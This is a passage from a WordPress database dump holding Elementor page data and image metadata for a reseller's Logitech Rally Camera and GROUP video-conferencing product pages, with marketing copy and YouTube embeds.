anything in the meeting space when idle. The lens lifts to a preset position when joining a meeting and parks automatically when the meeting ends. In addition, whenever video is muted during a meeting, a status light illuminates red to affirm visual privacy.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c7d6951\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2ab0660\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-camera-1.jpg\",\"id\":2894}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(5239,2895,'_elementor_version','0.4'),(5242,2896,'_wp_page_template','template-fullwidth.php'),(5243,2896,'_elementor_edit_mode','builder'),(5244,2896,'_elementor_template_type','post'),(5245,2896,'_elementor_data','[{\"id\":\"86de509\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"33f9f97\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e581d05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Rally Camera<\\/h3><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control.<\\/p><ul><li>RightSense\\u2122 technology automates a better user experience<\\/li><li>Advanced optics frame every participant with amazing clarity<\\/li><li>Sleek industrial design for any professional meeting space<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fe7a801\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4c89bc6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ffa2dfc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f116c41\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9992432\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Peerless Performance. Exceptional Versatility.<\\/h3><p><br \\/>With premium industrial design and an Ultra-HD imaging system, Rally Camera tops the lineup of standalone video cameras from Logitech\\u00ae. Packed with advanced optics and breakthrough technologies, Rally Camera delivers premium performance in professional meeting spaces of all shapes and sizes. With whisper-quiet mechanical Pan\\/Tilt\\/Zoom, razor-sharp 15X HD zoom, expansive 90\\u00b0 field of view, and powerful 4K sensor, Rally Camera captures every person in the room with truly phenomenal video quality.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c4ca731\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"aaa3964\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fe25005\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/TWRoAslIm0c\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"e7053cc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1508e06\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>STUDIO-QUALITY VIDEO<\\/h3><p>With an Ultra-HD imaging system, Rally Camera delivers brilliantly sharp video, outstanding colour, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLight\\u2122 technology optimises light balance to emphasise faces and render natural-looking skin tones, even in dim or backlit conditions.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6fc3397\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"314e459\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a243665\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SLEEK INDUSTRIAL DESIGN<\\/h3><p>Rally Camera incorporates world-class Logitech optics and 4K sensor in a premium industrial design suitable for any professional setting. Elegantly finished in matte black with slate gray metal trim, Rally Camera can be positioned on a table, mounted on a tripod, or secured to a wall with included hardware. For overhead installations, the camera detects when it\\u2019s inverted and automatically corrects image orientation and camera controls.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e2af137\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ca82ea0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-camera.jpg\",\"id\":2892}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f080e0a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6c69b5a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3ecdf9d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SEE EVERYONE, PERFECTLY FRAMED<\\/h3><p>Logitech RightSight\\u2122 camera control automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.<\\/p><p>Future Availability: RightSight will be enabled by a software download, with initial support for Windows 10.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c822b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d1e8d28\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b74d921\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/-xGIqpPOyXs\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"240e7e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2001884\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ENHANCED USER EXPERIENCE<\\/h3><p>Logitech RightSense\\u2122 is a suite of proactive technologies built into Rally Camera that automate a better user experience. RightSight\\u2122 automates camera control to perfectly frame participants, no matter their distance from the lens. RightLight\\u2122 optimises light balance and prioritises faces over objects and surfaces to render natural-looking skin tones. Plus, Rally Camera is compatible with virtually any video conferencing app right out of the box.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b84fa85\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5460384\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"975ce9d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PRIVACY ASSURANCE<\\/h3><p>When Rally Camera is not in use, the lens defaults to a parked position where the lens is pointed straight down. This provides visual affirmation that the camera is unable to \\u201csee\\u201d anything in the meeting space when idle. The lens lifts to a preset position when joining a meeting and parks automatically when the meeting ends. In addition, whenever video is muted during a meeting, a status light illuminates red to affirm visual privacy.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c7d6951\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2ab0660\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-camera-1.jpg\",\"id\":2894}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(5246,2896,'_elementor_version','0.4'),(5250,2885,'_oembed_540abe694c029a2877e1f8d2230e3b1c','<iframe width=\"800\" height=\"450\" src=\"https://www.youtube.com/embed/TWRoAslIm0c?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(5251,2885,'_oembed_time_540abe694c029a2877e1f8d2230e3b1c','1551682831'),(5252,2885,'_oembed_b2944ddc4cce0daf95f504cfcecc2220','<iframe width=\"800\" height=\"450\" src=\"https://www.youtube.com/embed/-xGIqpPOyXs?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(5253,2885,'_oembed_time_b2944ddc4cce0daf95f504cfcecc2220','1551682831'),(5268,2000,'_elementor_data','[{\"id\":\"d56b4cd\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"a471602\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"455bf20\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP<\\/h3><p>Affordable video conferencing for mid to large-sized meeting rooms<\\/p><ul><li>See every detail with HD video and 10x zoom<\\/li><li>Works with your meeting and video conferencing applications<\\/li><li>Crystal-clear audio for up to 20 participants<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1b32e49\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"06b0dd9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0cf1dd7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef73f1a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"da02547\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fada155\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5d35ea7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"343b905\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/vOMW9wEaoqo\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"0cdde62\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"09a199f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PERFECT FOR LARGER ROOMS<\\/h3><p>GROUP, our video conferencing solution for rooms that seat 14\\u201320 people, delivers high quality HD video and crystal clear audio, allowing any meeting place to be a video collaboration space. With advanced features like acoustic echo cancellation, noise reduction technology, and intuitive controls, it\\u2019s easier than ever to include everyone in the conversation.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad5cd3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3f81ce3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6cdee74\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PLUG-AND-PLAY SIMPLICITY<\\/h3><p>USB plug-and-play connectivity makes GROUP a breeze to deploy and use. Simply connect GROUP the conference room computer or your laptop through USB, and you\\u2019re good to go. Use GROUP with any video conferencing software, including those you already use. For great-sounding audio calls, pair your mobile device with Bluetooth\\u00ae wireless technology to the GROUP speakerphone.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"664604d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0b7f779\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/conferencecam-group.jpg\",\"id\":2900}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"696dda5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"002c882\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0be4251\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/conferencecam-group-1.jpg\",\"id\":2901}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"428141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"eba90b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>HIGH-DEFINITION VIDEO<\\/h3><p>Bring meetings into focus with GROUP\\u2019s premium lens, 10x lossless zoom, and HD 1080p\\/30 performance. Perfectly frame presenters and whiteboards with pan\\/tilt control, and zoom in for detail and clarity. GROUP\\u2019s 90\\u00b0 field-of-view provides ideal coverage for medium and large conference rooms, with motorized pan and tilt for wall-to-wall, floor-to-ceiling coverage.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9676476\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8f5bcba\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"174c105\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>NATURAL-SOUNDING AUDIO<\\/h3><p>Everyone hears and can be heard with GROUP\\u2019s full-duplex speakerphone, which delivers sound that\\u2019s crisp, clear, and highly intelligible. Acoustic echo cancellation and noise reduction technology make conversations natural-sounding while reducing reverberation and ambient noise.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"afc26c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f9d268f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/conferencecam-group-2.jpg\",\"id\":2902}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b8c4f13\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"83ae89b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"32fffa1\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"99a4e2b\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"5968086\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"51b43f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SPEAKERPHONE WITH BLUETOOTH<\\/h4><p>Hear and be heard with life-like clarity. GROUP\\u2019s full-duplex speakerphone provides 360\\u00b0 coverage with four omnidirectional mics. Beamforming technology helps pick up speech throughout a 6m \\/ 20 ft diameter while reducing keyboard clicks and other audible distractions. You can even pair GROUP with your smartphone or tablet to enjoy outstanding audio clarity and ample volume with mobile applications and conference calls.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5b98fa4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c3150a6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CERTIFIED FOR BUSINESS<\\/h4><p>GROUP offers a plug-and-play USB connection to conference room computers, and is certified for Skype for Business, Microsoft Cortana\\u00ae, Cisco Jabber\\u2122 compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with GROUP.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31efa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8d36663\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CONVENIENT CONTROLS<\\/h4><p>GROUP\\u2019s speakerphone provides a convenient dock for the handheld remote control, and features an LCD status screen and tactile buttons to mute audio, adjust volume, move the camera, and more.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f572933\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c52992d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>AVAILABLE EXPANSION MICS<\\/h4><p>Extend the range of the GROUP video conferencing system with Logitech GROUP Expansion Mics. Accommodate up to 20 people in one large room and make sure everyone\\u2019s voice can be heard. Simply plug the microphones into the GROUP speakerphone: they are automatically recognized and configured. An indicator light shows when the microphone is muted, when a call is active, and when Bluetooth wireless pairing has begun.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"616c1d1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"cea2e79\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8c9754e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MUTE WITH CONFIDENCE<\\/h4><p>With tactile mute buttons on the speakerphone, handheld remote, and optional expansion mics, GROUP makes it easy to assure your privacy. When muted, GROUP\\u2019s LED status ring lights up red, a subtle yet obvious assurance that\\u2019s easily seen throughout the room.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"542032b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6ed52df\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CABLING MADE EASY<\\/h4><p>GROUP\\u2019s compact Hub simplifies cabling and makes it easy to run cables under tables and through conduit. Integrated data and power means that the camera and speakerphone each connect with a single cable. The included 5m \\/ 16 ft cables give you lots of placement options, while optional extended cables offer double or triple the reach.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4ae168e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2371100\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>FIELD UPGRADEABLE<\\/h4><p>With regular firmware updates, Logitech continuously improves the GROUP video conferencing experience. For example, recent updates delivered substantial improvements to automatic echo cancellation and gain control, plus upgraded beamforming and duplex performance. It\\u2019s another reason why Logitech delivers the best value proposition in the industry.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b1f3494\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"99173ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f1cfa7b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5259,2900,'_wp_attached_file','2019/02/conferencecam-group.jpg'),(5260,2900,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:31:\"2019/02/conferencecam-group.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"conferencecam-group-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"conferencecam-group-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"conferencecam-group-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:31:\"conferencecam-group-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:31:\"conferencecam-group-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:31:\"conferencecam-group-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:29:\"conferencecam-group-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5261,2900,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:2.724280187247504425585020726430229842662811279296875;s:5:\"bytes\";i:2549;s:11:\"size_before\";i:93566;s:10:\"size_after\";i:91017;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.75;s:5:\"bytes\";i:247;s:11:\"size_before\";i:5204;s:10:\"size_after\";i:4957;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.279999999999999804600747665972448885440826416015625;s:5:\"bytes\";i:285;s:11:\"size_before\";i:8679;s:10:\"size_after\";i:8394;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.430000000000000159872115546022541821002960205078125;s:5:\"bytes\";i:724;s:11:\"size_before\";i:29787;s:10:\"size_after\";i:29063;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.54000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:280;s:11:\"size_before\";i:7918;s:10:\"size_after\";i:7638;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:408;s:11:\"size_before\";i:16962;s:10:\"size_after\";i:16554;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:605;s:11:\"size_before\";i:25016;s:10:\"size_after\";i:24411;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(5262,2901,'_wp_attached_file','2019/02/conferencecam-group-1.jpg'),(5263,2901,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:33:\"2019/02/conferencecam-group-1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"conferencecam-group-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"conferencecam-group-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"conferencecam-group-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:33:\"conferencecam-group-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:33:\"conferencecam-group-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:33:\"conferencecam-group-1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:31:\"conferencecam-group-1-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5264,2901,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.45704422178910508733906681300140917301177978515625;s:5:\"bytes\";i:7798;s:11:\"size_before\";i:174959;s:10:\"size_after\";i:167161;s:4:\"time\";d:0.09000000000000001054711873393898713402450084686279296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.37999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:483;s:11:\"size_before\";i:7568;s:10:\"size_after\";i:7085;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.5099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:794;s:11:\"size_before\";i:14414;s:10:\"size_after\";i:13620;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.720000000000000195399252334027551114559173583984375;s:5:\"bytes\";i:2191;s:11:\"size_before\";i:58884;s:10:\"size_after\";i:56693;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.28000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:865;s:11:\"size_before\";i:13775;s:10:\"size_after\";i:12910;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.55999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:1440;s:11:\"size_before\";i:31582;s:10:\"size_after\";i:30142;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:2025;s:11:\"size_before\";i:48736;s:10:\"size_after\";i:46711;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(5265,2902,'_wp_attached_file','2019/02/conferencecam-group-2.jpg'),(5266,2902,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:33:\"2019/02/conferencecam-group-2.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4